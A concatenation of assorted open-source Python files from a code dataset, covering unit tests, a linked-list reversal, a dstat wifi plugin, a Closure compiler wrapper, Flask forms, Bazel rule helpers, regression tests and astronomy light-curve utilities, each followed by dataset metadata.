# the model's built-in defaults are used; confirm whether this should be
# SVMLR(v=v, DEBUG=True).
model = SVMLR(DEBUG=True)
data_arff = arff.ArffFile()
data_arff.load("iris_dense.xarff")
# Learning with the default quadratic-programming (cvxopt) solver
model.learn(data_arff)
print("Process learning with quadratic-programming algorithm finished")
# Prediction on one held-out instance (index 120) and one from the start
predictions = model.evaluate([data_arff.data[120]])
print("Prediction with quadratic-programing cvxopt is \n")
print(predictions, data_arff.data[120][-1:])
print(model.evaluate([data_arff.data[0]]), data_arff.data[0][-1:])
print("\n")
# Learning again, this time with the Frank-Wolfe solver
model.learn(data_arff, solver='frank-wolfe')
print("Process learning with frank-wolfe algorithm finished")
predictions = model.evaluate([data_arff.data[120]])
print("Prediction with frank-wolfe is \n")
print(predictions, data_arff.data[120][-1:])
print(model.evaluate([data_arff.data[0]]), data_arff.data[0][-1:])
print("\n")
model.plot_solver_convergence()
| 3.125 | 3 |
tests/suite/oop/reflection/helpers/test_is_callable.py | infosmith/batteries | 0 | 12762534 | <filename>tests/suite/oop/reflection/helpers/test_is_callable.py
import unittest
import pytest
from helpers.oop.reflection.helpers import is_callable as uut
@pytest.mark.usefixtures('oop_reflection_testcase')
class TestIsCallable(unittest.TestCase):
    # The fixture above injects ``self.testcase``, an object exposing an
    # ``instance_method`` attribute used by the second test.
    def test_is_callable_with_function(self):
        """A builtin function is reported callable."""
        self.assertTrue(uut(print))
    def test_is_callable_with_instance_method(self):
        """A method looked up by name on an instance is reported callable."""
        self.assertTrue(uut('instance_method', instance=self.testcase))
| 2.703125 | 3 |
inheritance/zoo/project/bear.py | borko81/SU_OOP_2021 | 0 | 12762535 | from polymorhism.project import Mammal
class Bear(Mammal):
    """A bear; inherits all behaviour unchanged from Mammal."""
ReverseLinkedList.py | NickMonks/AlgorithmsAndDataStructure | 0 | 12762536 | <gh_stars>0
# This is an input class. Do not edit.
class LinkedList:
    """A singly linked list node holding a value and a pointer to the next node."""
    def __init__(self, value):
        self.value = value  # payload stored in this node
        self.next = None    # successor node; None marks the tail
def reverseLinkedList(head):
    """Reverse a singly linked list in place and return the new head.

    Walks the list once with two pointers: ``prev`` trails behind ``curr``,
    and each step re-points ``curr.next`` backwards.  A temporary reference
    to the old successor is taken before the pointer flip so the traversal
    can continue.  When ``curr`` runs off the end, ``prev`` is the new head.
    Works for an empty list too (returns None).
    """
    prev = None
    curr = head
    while curr is not None:
        successor = curr.next   # remember where to go before flipping the link
        curr.next = prev        # reverse this node's pointer
        prev = curr
        curr = successor
    return prev
initrd/usr/share/dstat/dstat_wifi.py | OpenCloudOS/OpenCloudOS-tools | 8 | 12762537 | <reponame>OpenCloudOS/OpenCloudOS-tools
global iwlibs
from pythonwifi import iwlibs
class dstat_plugin(dstat):
    """Dstat plugin reporting wifi link quality and signal/noise ratio.

    NOTE: written in Python 2 syntax (``raise Exception, ...``); this plugin
    targets the Python 2 dstat runtime and must not be run under Python 3.
    """
    def __init__(self):
        self.name = 'wifi'
        self.type = 'd'  # decimal display type
        self.width = 3
        self.scale = 33
        self.check()
        self.vars = iwlibs.getNICnames()  # one ('lnk', 's/n') column pair per wireless NIC
        self.nick = ('lnk', 's/n')
        self.cols = 2
    def check(self):
        # Rebind the module-level name so the rest of the plugin can use it.
        global iwlibs
        try:
            from pythonwifi import iwlibs
        except:
            raise Exception, 'Needs python-wifi module'
    def extract(self):
        for name in self.vars:
            wifi = iwlibs.Wireless(name)
            stat, qual, discard, missed_beacon = wifi.getStatistics()
            # print qual.quality, qual.signallevel, qual.noiselevel
            # NOTE(review): -101 and -256 appear to be driver sentinels for
            # "no reading" -- confirm against the python-wifi docs.
            if qual.quality == 0 or qual.signallevel == -101 or qual.noiselevel == -101 or qual.signallevel == -256 or qual.noiselevel == -256:
                self.val[name] = ( -1, -1 )
            else:
                self.val[name] = ( qual.quality, qual.signallevel * 100 / qual.noiselevel )
# vim:ts=4:sw=4:et
| 2.59375 | 3 |
third_party/closure_compiler/compiler.py | zealoussnow/chromium | 14,668 | 12762538 | <reponame>zealoussnow/chromium<filename>third_party/closure_compiler/compiler.py
#!/usr/bin/python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs Closure compiler on JavaScript files to check for errors and produce
minified output."""
from __future__ import print_function
import os
import subprocess
# Directory containing this script; the JDK and compiler.jar are resolved
# relative to it.
_CURRENT_DIR = os.path.join(os.path.dirname(__file__))
_JAVA_PATH = os.path.join(_CURRENT_DIR, "..", "jdk", "current", "bin", "java")
# The bundled JDK is only checked out in Android builds, hence the message.
assert os.path.isfile(_JAVA_PATH), "java only allowed in android builds"
class Compiler(object):
  """Runs the Closure compiler on given source files to typecheck them
  and produce minified output."""

  _JAR_COMMAND = [
      _JAVA_PATH,
      "-jar",
      "-Xms1024m",
      "-client",
      "-XX:+TieredCompilation",
  ]

  def __init__(self, verbose=False):
    """
    Args:
      verbose: Whether this class should output diagnostic messages.
    """
    self._compiler_jar = os.path.join(_CURRENT_DIR, "compiler", "compiler.jar")
    self._verbose = verbose

  def _log_debug(self, msg, error=False):
    """Logs |msg| to stdout if --verbose/-v is passed when invoking this script.

    Args:
      msg: A debug message to log.
    """
    if self._verbose:
      print("(INFO) %s" % msg)

  def run_jar(self, jar, args):
    """Runs a .jar from the command line with arguments.

    Args:
      jar: A file path to a .jar file
      args: A list of command line arguments to be passed when running the .jar.

    Return:
      (exit_code, stderr) The exit code of the command (e.g. 0 for success) and
          the stderr collected while running |jar| (as a string).
    """
    shell_command = " ".join(self._JAR_COMMAND + [jar] + args)
    self._log_debug("Running jar: %s" % shell_command)

    # BUGFIX: the devnull handle was previously opened and never closed,
    # leaking one file descriptor per run_jar() call.  Closing it via a
    # context manager is deterministic and works on Python 2 and 3.
    with open(os.devnull, "w") as devnull:
      process = subprocess.Popen(shell_command, universal_newlines=True,
                                 shell=True, stdout=devnull,
                                 stderr=subprocess.PIPE)
      _, stderr = process.communicate()
    return process.returncode, stderr
| 2.1875 | 2 |
app/main/forms.py | CheboiDerrick/flask-blog-app | 0 | 12762539 | <gh_stars>0
from flask_wtf import FlaskForm
from wtforms import StringField, SelectField, TextAreaField, SubmitField
from wtforms.validators import Required
class UpdateProfile(FlaskForm):
    """Form for editing a user's profile bio."""
    # NOTE(review): wtforms' Required validator is deprecated in favour of
    # DataRequired -- confirm the installed wtforms version before migrating.
    bio = TextAreaField('Tell us a little about your awesome self.',validators = [Required()])
    submit = SubmitField('Update')
class BlogForm(FlaskForm):
    """Form for creating a blog post: title, category pick-list and body."""
    title = StringField('Title', validators=[Required()])
    category = SelectField('Category', choices=[('Design','Design'),('Entertainment','Entertainment'),('Fashion & Style','Fashion & Style'),('Photography','Photograpgy'),('Business','Business')],validators=[Required()])
    post = TextAreaField('Blog', validators=[Required()])
    submit = SubmitField('Post')
class CommentForm(FlaskForm):
    """Form for leaving a comment on a blog post."""
    comment = TextAreaField('Leave a comment',validators=[Required()])
    submit = SubmitField('Add Comment')
week06/02.Generators/cycle.py | TsvetomirTsvetkov/Python-Course-101 | 0 | 12762540 | # cycle.py
def cycle(iterable):
    """Yield the items of *iterable* over and over, indefinitely.

    BUGFIX: the previous implementation yielded the *indices*
    ``0 .. len(iterable)-1`` instead of the items themselves, which was
    indistinguishable only when the input happened to be ``range(0, n)``.
    It also required a sized iterable (it called ``len``); this version
    works with any re-iterable sequence.
    """
    while True:
        for item in iterable:
            yield item
endless = cycle(range(0, 10))
# NOTE: this loop is intentionally infinite -- the generator never raises
# StopIteration, so the script keeps printing forever until interrupted.
for item in endless:
    print(item)
| 3.71875 | 4 |
src/main/starlark/builtins_bzl/common/rule_util.bzl | AyuMol758/bazel | 16,989 | 12762541 | <reponame>AyuMol758/bazel
# Copyright 2021 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines create_rule and create_dep macros"""
def create_rule(impl, attrs = {}, deps = [], fragments = [], remove_attrs = [], **kwargs):
    """Creates a rule composed from dependencies.

    Args:
        impl: The implementation function of the rule, taking as parameters the
            rule ctx followed by the executable function of each dependency
        attrs: Dict of attributes required by the rule. These will override any
            conflicting attributes specified by dependencies
        deps: Dict of name->dependency mappings, with each dependency struct
            created using 'create_dep'. The keys of this dict are the parameter
            names received by 'impl'
        fragments: List of configuration fragments required by the rule
        remove_attrs: List of attributes to remove from the implementation.
        **kwargs: extra args to be passed for rule creation

    Returns:
        The composed rule
    """
    merged_attrs = dict()
    # Copy so the caller's list is never mutated by the extend() calls below.
    fragments = list(fragments)
    merged_mandatory_attrs = []
    for dep in deps:
        merged_attrs.update(dep.attrs)
        fragments.extend(dep.fragments)
        merged_mandatory_attrs.extend(dep.mandatory_attrs)
    # Rule-level attrs win over any conflicting dependency attrs.
    merged_attrs.update(attrs)
    for attr in remove_attrs:
        if attr in merged_mandatory_attrs:
            fail("Cannot remove mandatory attribute %s" % attr)
        # NOTE(review): dict.pop with no default errors when the key is
        # absent, so remove_attrs must only name attributes that exist.
        merged_attrs.pop(attr)
    return rule(
        implementation = impl,
        attrs = merged_attrs,
        fragments = fragments,
        **kwargs
    )
def create_dep(call, attrs = {}, fragments = [], mandatory_attrs = None):
    """Combines a dependency's executable function, attributes, and fragments.

    Args:
        call: the executable function
        attrs: dict of required rule attrs
        fragments: list of required configuration fragments
        mandatory_attrs: list of attributes that can't be removed later
            (when not set, all attributes are mandatory)

    Returns:
        The struct
    """
    # An unset (or empty) mandatory_attrs means every attribute is mandatory.
    if not mandatory_attrs:
        mandatory_attrs = attrs.keys()
    return _create_dep(call, attrs, fragments, mandatory_attrs)
def _create_dep(call, attrs = {}, fragments = [], mandatory_attrs = []):
    # Internal helper: bundle a dependency's pieces into a plain struct.
    return struct(
        call = call,
        attrs = attrs,
        fragments = fragments,
        mandatory_attrs = mandatory_attrs,
    )
def create_composite_dep(merge_func, *deps):
    """Creates a dependency struct from multiple dependencies

    Args:
        merge_func: The executable function to evaluate the dependencies.
        *deps: The dependencies to compose provided as keyword args

    Returns:
        A dependency struct
    """
    attrs = {}
    frags = []
    mandatory = []
    for dep in deps:
        attrs.update(dep.attrs)
        frags.extend(dep.fragments)
        mandatory.extend(dep.mandatory_attrs)
    return _create_dep(
        call = merge_func,
        attrs = attrs,
        fragments = frags,
        mandatory_attrs = mandatory,
    )
| 1.984375 | 2 |
api/sitesync/__init__.py | pypeclub/openpype4-backend | 2 | 12762542 | __all__ = ["router"]
from sitesync.sitesync import router
| 1.109375 | 1 |
pyne/tests/test_data_checksums.py | AllSafeCyberSecur1ty/Nuclear-Engineering | 1 | 12762543 | <reponame>AllSafeCyberSecur1ty/Nuclear-Engineering<filename>pyne/tests/test_data_checksums.py
""" test data_checksums and hashing functions"""
import os
import warnings
from shutil import copyfile
import nose
from nose.tools import assert_equal, assert_true
from pyne.utils import QAWarning
warnings.simplefilter("ignore", QAWarning)
import pyne
# These tests require nuc_data
if not os.path.isfile(pyne.nuc_data):
raise RuntimeError("Tests require nuc_data.h5. Please run nuc_data_make.")
def test_data_checksums():
    """Verify the bundled nuc_data table digests against known MD5 values."""
    from pyne.data import data_checksums

    expected = {
        "/atomic_mass": "10edfdc662e35bdfab91beb89285efff",
        "/material_library": "8b10864378fbd88538434679acf908cc",
        "/neutron/eaf_xs": "29622c636c4a3a46802207b934f9516c",
        "/neutron/scattering_lengths": "a24d391cc9dc0fc146392740bb97ead4",
        "/neutron/simple_xs": "3d6e086977783dcdf07e5c6b0c2416be",
        "/decay": "4f41f3e46f4306cc44449f08a20922e0",
        "/dose_factors": "dafa32c24b2303850a0bebdf3e6b122e",
    }
    assert_equal(len(data_checksums), 7)
    for table, digest in expected.items():
        assert_equal(data_checksums[table], digest)
def test_internal_hashes():
    """Set internal hashes on nuc_data (or a scratch copy) and verify them."""
    from pyne.dbgen import hashtools

    if os.access(pyne.nuc_data, os.W_OK):
        test_data, remove_data = pyne.nuc_data, False
    else:
        # No write permission on the installed file: work on a throwaway
        # copy so we don't try to modify a file we can't write to.
        test_data, remove_data = "test_nuc_data.h5", True
        copyfile(pyne.nuc_data, test_data)
    hashtools.set_internal_hashes(test_data)
    for _item, ok in hashtools.check_internal_hashes(test_data):
        assert_true(ok)
    if remove_data:
        os.remove(test_data)
# Allow running this module directly: delegate to nose's module runner.
if __name__ == "__main__":
    nose.runmodule()
| 2.296875 | 2 |
def oddTuples(aTup):
    '''
    aTup: a tuple
    returns: tuple, every other element of aTup.
    '''
    # Extended slicing with step 2 picks indices 0, 2, 4, ...
    return aTup[::2]
| 3.609375 | 4 |
tests/test_regression.py | psesh/Efficient-Quadratures | 59 | 12762545 | <gh_stars>10-100
from unittest import TestCase
import unittest
from equadratures import *
from equadratures import datasets
import numpy as np
import scipy.stats as st
class TestC(TestCase):
    """Regression tests for equadratures polynomial fitting: least-squares,
    robust regression, elastic-net regularisation and polynomial UQ."""
    def test_quadratic(self):
        """Least-squares fit of a univariate quadratic against known coefficients."""
        dimensions = 1
        M = 12
        param = Parameter(distribution='Uniform', lower=0, upper=1., order=2)
        myParameters = [param for i in range(dimensions)] # one-line for loop for parameters
        x_train = np.asarray([0.0,0.0714,0.1429,0.2857,0.3571,0.4286,0.5714,0.6429,0.7143,0.7857,0.9286,1.0000])
        y_train = np.asarray([6.8053,-1.5184,1.6416,6.3543,14.3442,16.4426,18.1953,28.9913,27.2246,40.3759,55.3726,72.0])
        x_train = np.reshape(x_train, (M, 1))
        y_train = np.reshape(y_train, (M, 1))
        myBasis = Basis('univariate')
        poly = Poly(myParameters, myBasis, method='least-squares', sampling_args={'sample-points':x_train, 'sample-outputs':y_train})
        poly.set_model()
        coefficients = poly.get_coefficients().reshape(3, )
        true_coefficients = np.asarray([22.47470337, 17.50891379, 4.97964868])
        np.testing.assert_array_almost_equal(coefficients, true_coefficients, decimal=4, err_msg='Problem!')
    def test_robust(self):
        """
        Tests robust regression (huber and least-absolute-residual), with osqp and scipy backends.
        """
        methods = ['huber','least-absolute-residual']
        opts = ['osqp','scipy']
        f = lambda x: (-0.3*x**4 -3*x**3 +0.6*x**2 +2.4*x - 0.5)
        N = 50 # number of training points (note, some will be removed below)
        n = 4 # degree of polynomial
        state = 15 # random seed
        # Add some noise
        noise_var = 0.1
        x = np.sort(np.random.RandomState(state).uniform(-1,1,N))
        y = f(x) + np.random.RandomState(state).normal(0,noise_var,size=N).T
        # delete training points between 0 < x < 0.3
        pos = ((x>0)*(x<0.3)).nonzero()[0]
        x = np.delete(x,pos)
        y = np.delete(y,pos)
        # Add some outliers
        randrange = range(10,17)
        y[randrange] = y[randrange]+np.random.RandomState(1).normal(0,4**2,len(randrange))
        # Test data
        x = x.reshape(-1,1)
        xtest = np.linspace(-1,1,100).reshape(-1,1)
        ytest = f(xtest)
        # param and basis
        param = Parameter(distribution='uniform', lower=-1, upper=1, order=n)
        basis = Basis('univariate')
        # Test Poly regressions
        for method in methods:
            for opt in opts:
                if method != 'huber' and opt != 'scipy': # TODO - remove this if statement once scipy huber regression implemented
                    poly = Poly(parameters=param, basis=basis, method=method,
                            sampling_args= {'mesh': 'user-defined', 'sample-points':x.reshape(-1,1), 'sample-outputs': y.reshape(-1,1)},
                            solver_args={'M':0.2**2,'verbose':False,'optimiser':opt})
                    poly.set_model()
                    _,r2 = poly.get_polyscore(X_test=xtest,y_test=ytest)
                    self.assertTrue(r2 > 0.997,msg='Poly method = %a, optimiser = %a' %(method,opt))
    def test_ElasticNet_linear(self):
        """
        Tests elastic-net regularisation on linear (1st order) synthetic data with irrelevent features. (using cvxpy LP solve here).
        """
        # Load linear dataset with n_observations=500,n_dim=10,bias=0.5,n_relevent=2,noise=0.2,train/test split = 0.8
        data = np.load('./tests/test_data/linear_data.npz')
        X_train = data['X_train']; y_train = data['y_train']; X_test = data['X_test']; y_test = data['y_test']
        # Define param and basis
        s = Parameter(distribution='uniform', lower=-1, upper=1, order=1,endpoints='both')
        param = [s for _ in range(X_train.shape[1])]
        basis = Basis('total-order')
        # Fit Poly with OLS and Elastic Net (but with lambda=0 so effectively OLS) and check r2 scores match
        poly_OLS = Poly(parameters=param, basis=basis, method='least-squares',
                sampling_args= {'mesh': 'user-defined', 'sample-points':X_train, 'sample-outputs': y_train.reshape(-1,1)})
        poly_OLS.set_model()
        _,r2_OLS = poly_OLS.get_polyscore(X_test=X_test,y_test=y_test)
        # NOTE(review): the chained "poly_EN = poly = ..." alias looks
        # unintentional -- `poly` is not used afterwards; confirm.
        poly_EN = poly = Poly(parameters=param, basis=basis, method='elastic-net',
                sampling_args= {'mesh': 'user-defined', 'sample-points':X_train, 'sample-outputs': y_train.reshape(-1,1)},
                solver_args={'path':False,'lambda':0.0,'alpha':0.5})
        poly_EN.set_model()
        _,r2_EN = poly_EN.get_polyscore(X_test=X_test,y_test=y_test)
        np.testing.assert_array_almost_equal(r2_OLS,r2_EN, decimal=4, err_msg='Problem!')
        # Now fit Poly with LASSO (alpha = 1.0) and check r2 improved (it should because irrelevent features + noise)
        poly_LASSO = Poly(parameters=param, basis=basis, method='elastic-net',
                sampling_args= {'mesh': 'user-defined', 'sample-points':X_train, 'sample-outputs': y_train.reshape(-1,1)},
                solver_args={'path':False,'lambda':0.015,'alpha':1.0})
        poly_LASSO.set_model()
        _,r2_LASSO = poly_LASSO.get_polyscore(X_test=X_test,y_test=y_test)
        self.assertTrue(r2_LASSO > r2_OLS)
        # Finally, check LASSO has shrunk irrelevent Poly coefficients
        coeffs = poly_LASSO.get_coefficients().squeeze()
        ideal_coeffs = 3 #As tensor-grid, order=1, relevent_dims=2
        idx = np.abs(coeffs).argsort()[::-1]
        irrelevent_coeffs = np.sum(np.abs(coeffs[idx[ideal_coeffs:]]))/np.sum(np.abs(coeffs))
        self.assertTrue(irrelevent_coeffs < 1e-5,msg='irrelevent_coeffs = %.2e' %irrelevent_coeffs)
    def test_ElasticNet_friedman(self):
        """
        Tests elastic-net regularisation on quadratic (2nd order) synthetic data with irrelevent features. (using coord descent here).
        """
        # Generate friedman dataset with n_observations=200,n_dim=10,noise=0.2,normalise=False,train/test split of 0.8
        data = np.load('./tests/test_data/friedman_data.npz')
        X_train = data['X_train']; y_train = data['y_train']; X_test = data['X_test']; y_test = data['y_test']
        # Define param and basis
        s = Parameter(distribution='uniform', lower=-1, upper=1, order=2,endpoints='both')
        param = [s for _ in range(X_train.shape[1])]
        basis = Basis('total-order')
        # Fit OLS poly
        poly_OLS = Poly(parameters=param, basis=basis, method='least-squares',
                sampling_args= {'mesh': 'user-defined', 'sample-points':X_train, 'sample-outputs': y_train.reshape(-1,1)})
        poly_OLS.set_model()
        _,r2_OLS = poly_OLS.get_polyscore(X_test=X_test,y_test=y_test)
        # Fit Poly with LASSO (alpha = 1.0) and check r2 improved
        print('running elastic net')
        poly_LASSO = Poly(parameters=param, basis=basis, method='elastic-net',
                sampling_args= {'mesh': 'user-defined', 'sample-points':X_train, 'sample-outputs': y_train.reshape(-1,1)},
                solver_args={'path':True,'alpha':1.0})
        poly_LASSO.set_model()
        _,r2_LASSO = poly_LASSO.get_polyscore(X_test=X_test,y_test=y_test)
        self.assertTrue(r2_LASSO > r2_OLS)
        print(r2_LASSO,r2_OLS)
        # Finally, check LASSO has shrunk L1norm of coefficients
        coeffs_OLS = poly_OLS.get_coefficients().squeeze()
        coeffs_LASSO = poly_LASSO.get_coefficients().squeeze()
        l1_OLS = np.linalg.norm(coeffs_OLS,ord=1)
        l1_LASSO = np.linalg.norm(coeffs_LASSO,ord=1)
        self.assertTrue(l1_LASSO < l1_OLS,msg='l1_LASSO = %.2e, l1_OLS = %.2e' %(l1_LASSO,l1_OLS))
    def test_polyuq_empirical(self):
        """
        Tests the get poly eq routine when no variance data is given, i.e. when estimating the
        empirical variance from training data.
        """
        # # Generate data
        n = 1
        # Load linear dataset with n_observations=500,n_dim=10,bias=0.5,n_relevent=2,noise=0.2,train/test split = 0.8
        data = np.load('./tests/test_data/linear_data.npz')
        X_train = data['X_train']; y_train = data['y_train']
        N,dim = X_train.shape
        # Fit poly and approx its variance
        param = Parameter(distribution='Uniform', lower=-1, upper=1, order=n)
        myParameters = [param for i in range(dim)] # one-line for loop for parameters
        myBasis = Basis('total-order')
        poly = Poly(myParameters, myBasis, method='least-squares', sampling_args={'sample-points':X_train, 'sample-outputs':y_train.reshape(-1,1)} )
        poly.set_model()
        y_pred, y_std = poly.get_polyfit(X_train,uq=True)
        np.testing.assert_array_almost_equal(y_std.mean(), 0.67484, decimal=5, err_msg='Problem!')
    def test_polyuq_prescribed(self):
        """
        Tests the get poly uq routine when variance data is given in sampling_args.
        """
        # Generate data
        dim = 1
        n = 5
        N = 100
        our_function = lambda x: 0.3*x**4 -1.6*x**3 +0.6*x**2 +2.4*x - 0.5
        X = np.linspace(-1,1,N)
        y = our_function(X)
        # Array of prescribed variances at each training data point
        # y_var = state.uniform(0.05,0.2,N_train)**2
        y_var = 0.1*our_function(X)*X
        # Fit poly with prescribed variances
        param = Parameter(distribution='Uniform', lower=-1, upper=1, order=n)
        myParameters = [param for i in range(dim)] # one-line for loop for parameters
        myBasis = Basis('univariate')
        poly = Poly(myParameters, myBasis, method='least-squares', sampling_args={'sample-points':X.reshape(-1,1),
                                                                                  'sample-outputs':y.reshape(-1,1),
                                                                                  'sample-output-variances':y_var} )
        poly.set_model()
        y_pred, y_std = poly.get_polyfit(X,uq=True)
        np.testing.assert_array_almost_equal(y_std.mean(), 0.64015, decimal=5, err_msg='Problem!')
if __name__== '__main__':
unittest.main()
| 2.28125 | 2 |
unit_testing_course/lesson1/task1/task.py | behzod/pycharm-courses | 213 | 12762546 | # TODO: type solution here
| 1.046875 | 1 |
hendrics/lcurve.py | StingraySoftware/HENDRICS | 18 | 12762547 | <reponame>StingraySoftware/HENDRICS
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Light curve-related functions."""
import os
import warnings
import copy
from astropy import log
import numpy as np
from astropy.logger import AstropyUserWarning
from stingray.lightcurve import Lightcurve
from stingray.utils import assign_value_if_none
from stingray.gti import create_gti_mask, cross_gtis, contiguous_regions
from .base import (
_look_for_array_in_array,
hen_root,
mkdir_p,
interpret_bintime,
)
from .io import load_events, save_lcurve, load_lcurve
from .io import HEN_FILE_EXTENSION, high_precision_keyword_read, get_file_type
from .base import deorbit_events
def join_lightcurve_objs(lclist):
    """Join light curves.

    Light curves from different instruments are put in different channels.
    Light curves from the same time interval and instrument raise
    a ValueError.

    Parameters
    ----------
    lclist : list of :class:`Lightcurve` objects
        The list of light curves to join

    Returns
    -------
    lcoutlist : joint light curves, one per instrument

    See Also
    --------
    scrunch_lightcurves : Create a single light curve from input light
                          curves.

    Examples
    --------
    >>> lcA = Lightcurve(np.arange(4), np.zeros(4))
    >>> lcA.instr='BU' # Test also case sensitivity
    >>> lcB = Lightcurve(np.arange(4) + 4, [1, 3, 4, 5])
    >>> lcB.instr='bu'
    >>> lcC = join_lightcurve_objs((lcA, lcB))
    >>> np.all(lcC['bu'].time == np.arange(8))
    True
    >>> np.all(lcC['bu'].counts == [0, 0, 0, 0, 1, 3, 4, 5])
    True
    """
    # --------------- Check consistency of data --------------
    lcdts = [lcdata.dt for lcdata in lclist]
    # Find unique elements. If multiple bin times are used, throw an exception
    lcdts = list(set(lcdts))
    if len(lcdts) != 1:
        # BUGFIX: this used to be a bare ``assert``, which disappears under
        # ``python -O``; enforce the precondition with a real exception.
        raise ValueError("Light curves must have same dt for joining")

    instrs = [
        lcdata.instr.lower()
        for lcdata in lclist
        if (hasattr(lcdata, "instr") and lcdata.instr is not None)
    ]

    # Find unique elements. A lightcurve will be produced for each instrument
    instrs = list(set(instrs))
    if not instrs:
        instrs = ["unknown"]

    outlcs = {}
    for instr in instrs:
        outlcs[instr.lower()] = None
    # -------------------------------------------------------

    for lcdata in lclist:
        instr = assign_value_if_none(lcdata.instr, "unknown").lower()
        if outlcs[instr] is None:
            outlcs[instr] = lcdata
        else:
            # Same instrument and overlapping interval: delegate to
            # Lightcurve.join (raises ValueError on conflicting bins).
            outlcs[instr] = outlcs[instr].join(lcdata)

    return outlcs
def join_lightcurves(lcfilelist, outfile="out_lc" + HEN_FILE_EXTENSION):
    """Join light curves from different files.

    Light curves from different instruments are put in different channels.

    Parameters
    ----------
    lcfilelist : list of str
        List of input file names
    outfile :
        Output light curve

    See Also
    --------
        scrunch_lightcurves : Create a single light curve from input light
                              curves.

    """
    lcdatas = []
    for lcfile in lcfilelist:
        log.info("Loading file %s..." % lcfile)
        lcdatas.append(load_lcurve(lcfile))
        log.info("Done.")

    outlcs = join_lightcurve_objs(lcdatas)

    if outfile is not None:
        instrs = list(outlcs.keys())
        single_instr = len(instrs) == 1
        dname, fname = os.path.split(outfile)
        for instr in instrs:
            # With a single instrument, keep the requested file name;
            # otherwise prefix each output with the instrument label.
            tag = "" if single_instr else instr
            log.info("Saving joined light curve to %s" % outfile)
            save_lcurve(outlcs[instr], os.path.join(dname, tag + fname))

    return outlcs
def scrunch_lightcurve_objs(lclist):
    """Create a single light curve from input light curves.

    Light curves are appended when they cover different times, and summed when
    they fall in the same time range. This is done regardless of the channel
    or the instrument.

    Parameters
    ----------
    lcfilelist : list of :class:`stingray.lightcurve.Lightcurve` objects
        The list of light curves to scrunch

    Returns
    -------
    lc : scrunched light curve

    See Also
    --------
    join_lightcurves : Join light curves from different files

    Examples
    --------
    >>> lcA = Lightcurve(np.arange(4), np.ones(4))
    >>> lcA.instr='bu1'
    >>> lcB = Lightcurve(np.arange(4), [1, 3, 4, 5])
    >>> lcB.instr='bu2'
    >>> lcC = scrunch_lightcurve_objs((lcA, lcB))
    >>> np.all(lcC.time == np.arange(4))
    True
    >>> np.all(lcC.counts == [2, 4, 5, 6])
    True
    >>> np.all(lcC.instr == 'bu1,bu2')
    True
    """
    instrs = [lc.instr for lc in lclist]
    gti_lists = [lc.gti for lc in lclist]
    # Intersect all GTI lists so every curve is restricted to the common
    # good-time intervals before being summed.
    gti = cross_gtis(gti_lists)
    for lc in lclist:
        lc.gti = gti
        if hasattr(lc, "_apply_gtis"):  # pragma: no cover
            # Compatibility with old versions of stingray
            lc.apply_gtis = lc._apply_gtis
        lc.apply_gtis()
    # Determine limits
    lc0 = lclist[0]
    for lc in lclist[1:]:
        lc0 = lc0 + lc

    lc0.instr = ",".join(instrs)

    return lc0
def scrunch_lightcurves(
    lcfilelist, outfile="out_scrlc" + HEN_FILE_EXTENSION, save_joint=False
):
    """Create a single light curve from input light curves.

    Light curves are appended when they cover different times, and summed when
    they fall in the same time range. This is done regardless of the channel
    or the instrument.

    Parameters
    ----------
    lcfilelist : list of str
        The list of light curve files to scrunch

    Returns
    -------
    time : array-like
        The time array
    lc :
        The new light curve
    gti : [[gti0_0, gti0_1], [gti1_0, gti1_1], ...]
        Good Time Intervals

    Other Parameters
    ----------------
    outfile : str
        The output file name
    save_joint : bool
        If True, save the per-channel joint light curves

    See Also
    --------
    join_lightcurves : Join light curves from different files
    """
    # With save_joint the default output name of join_lightcurves is kept;
    # otherwise outfile=None suppresses the intermediate per-channel files.
    join_kwargs = {} if save_joint else {"outfile": None}
    lcdata = join_lightcurves(lcfilelist, **join_kwargs)

    lc0 = scrunch_lightcurve_objs(list(lcdata.values()))
    log.info("Saving scrunched light curve to %s" % outfile)
    save_lcurve(lc0, outfile)

    return lc0
def filter_lc_gtis(
    lc, safe_interval=None, delete=False, min_length=0, return_borders=False
):
    """Filter a light curve for GTIs.

    Parameters
    ----------
    lc : :class:`Lightcurve` object
        The input light curve

    Returns
    -------
    newlc : :class:`Lightcurve` object
        The output light curve, with counts outside the filtered GTIs set
        to zero
    borders : [[i0_0, i0_1], [i1_0, i1_1], ...], optional
        The indexes of the light curve corresponding to the borders of the
        GTIs. Returned if return_borders is set to True

    Other Parameters
    ----------------
    safe_interval : float or [float, float]
        Seconds to filter out at the start and end of each GTI. If single
        float, these safe windows are equal, otherwise the two numbers refer
        to the start and end of the GTI respectively
    delete : bool
        NOTE(review): accepted for API compatibility but not acted upon in
        the body -- bins outside GTIs are always zeroed, never removed.
    min_length : float
        Minimum length of GTI. GTIs below this length will be removed.
    return_borders : bool
        If True, return also the indexes of the light curve corresponding to
        the borders of the GTIs
    """
    mask, filtered_gtis = create_gti_mask(
        lc.time,
        lc.gti,
        return_new_gtis=True,
        safe_interval=safe_interval,
        min_length=min_length,
    )

    newlc = copy.copy(lc)
    # Zero out every bin that falls outside the filtered GTIs.
    newlc.counts[np.logical_not(mask)] = 0
    newlc.gti = filtered_gtis

    if not return_borders:
        return newlc

    border_mask = create_gti_mask(lc.time, filtered_gtis)
    return newlc, contiguous_regions(border_mask)
def lcurve_from_events(
    f,
    safe_interval=0,
    pi_interval=None,
    e_interval=None,
    min_length=0,
    gti_split=False,
    ignore_gtis=False,
    bintime=1.0,
    outdir=None,
    outfile=None,
    noclobber=False,
    deorbit_par=None,
):
    """Bin an event list in a light curve.

    Parameters
    ----------
    f : str
        Input event file name
    bintime : float
        The bin time of the output light curve

    Returns
    -------
    outfiles : list
        List of output light curves

    Other Parameters
    ----------------
    safe_interval : float or [float, float]
        Seconds to filter out at the start and end of each GTI. If single
        float, these safe windows are equal, otherwise the two numbers refer
        to the start and end of the GTI respectively
    pi_interval : [int, int]
        PI channel interval to select. Default None, meaning that all PI
        channels are used
    e_interval : [float, float]
        Energy interval to select (only works if event list is calibrated with
        `calibrate`). Default None
    min_length : float
